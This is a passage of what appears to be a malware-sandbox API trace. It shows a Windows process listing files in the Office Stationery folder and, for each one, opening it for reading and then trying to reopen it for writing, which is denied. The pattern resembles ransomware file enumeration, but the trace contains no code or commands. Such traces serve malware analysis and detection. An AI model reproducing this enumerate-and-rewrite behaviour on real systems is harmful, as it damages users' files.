dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.408] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.408] CloseHandle (hObject=0x424) returned 1 [0087.408] AreFileApisANSI () returned 1 [0087.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0087.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0087.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 72 [0087.409] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.409] GetLastError () returned 0x5 [0087.409] GetLastError () returned 0x5 [0087.409] SetLastError (dwErrCode=0x5) [0087.409] GetLastError () returned 0x5 [0087.409] SetLastError (dwErrCode=0x5) [0087.409] GetLastError () returned 0x5 [0087.409] SetLastError (dwErrCode=0x5) [0087.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0087.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0087.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.409] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2949, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SoftBlue.jpg", cAlternateFileName="")) returned 1 [0087.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0087.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0087.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0087.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0087.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0087.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.410] AreFileApisANSI () returned 1 [0087.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg", lpUsedDefaultChar=0x0) returned 71 [0087.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0087.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0087.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.410] AreFileApisANSI () returned 1 [0087.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0087.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8abb8 [0087.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg") returned 71 [0087.411] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.519] GetFileType (hFile=0x424) returned 0x1 [0087.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0087.519] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.519] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.520] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.520] CloseHandle (hObject=0x424) returned 1 [0087.520] AreFileApisANSI () returned 1 [0087.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0087.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8abb8 [0087.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg") returned 71 [0087.520] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.520] GetLastError () returned 0x5 [0087.520] GetLastError () returned 0x5 [0087.520] SetLastError (dwErrCode=0x5) [0087.520] GetLastError () returned 0x5 [0087.521] SetLastError (dwErrCode=0x5) [0087.521] GetLastError () returned 0x5 [0087.521] SetLastError (dwErrCode=0x5) [0087.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0087.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0087.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.521] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Stars.htm", cAlternateFileName="")) returned 1 [0087.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0087.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0087.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0087.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0087.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0087.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.522] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.522] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.522] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.522] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0087.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.522] AreFileApisANSI () returned 1 [0087.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm", lpUsedDefaultChar=0x0) returned 68 [0087.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0087.522] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.522] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0087.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0087.522] AreFileApisANSI () returned 1 [0087.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0087.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x823b8 [0087.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x823b8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm") returned 68 [0087.522] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.523] GetFileType (hFile=0x424) returned 0x1 [0087.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x823b8 | out: hHeap=0x20000) returned 1 [0087.524] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.524] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.524] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.524] CloseHandle (hObject=0x424) returned 1 [0087.524] AreFileApisANSI () returned 1 [0087.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0087.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82e68 [0087.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x82e68, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm") returned 68 [0087.524] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.525] GetLastError () returned 0x5 [0087.525] GetLastError () returned 0x5 [0087.525] SetLastError (dwErrCode=0x5) [0087.525] GetLastError () returned 0x5 [0087.525] SetLastError (dwErrCode=0x5) [0087.525] GetLastError () returned 0x5 [0087.525] SetLastError (dwErrCode=0x5) [0087.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82e68 | out: hHeap=0x20000) returned 1 [0087.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0087.525] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.525] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.525] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Stars.jpg", cAlternateFileName="")) returned 1 [0087.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0087.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0087.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0087.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.526] AreFileApisANSI () returned 1 [0087.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg", lpUsedDefaultChar=0x0) returned 68 [0087.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0087.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0087.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0087.526] AreFileApisANSI () returned 1 [0087.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0087.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82dd8 [0087.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 68 [0087.526] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.527] GetFileType (hFile=0x424) returned 0x1 [0087.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0087.528] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.528] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.528] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.528] CloseHandle (hObject=0x424) returned 1 [0087.531] AreFileApisANSI () returned 1 [0087.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 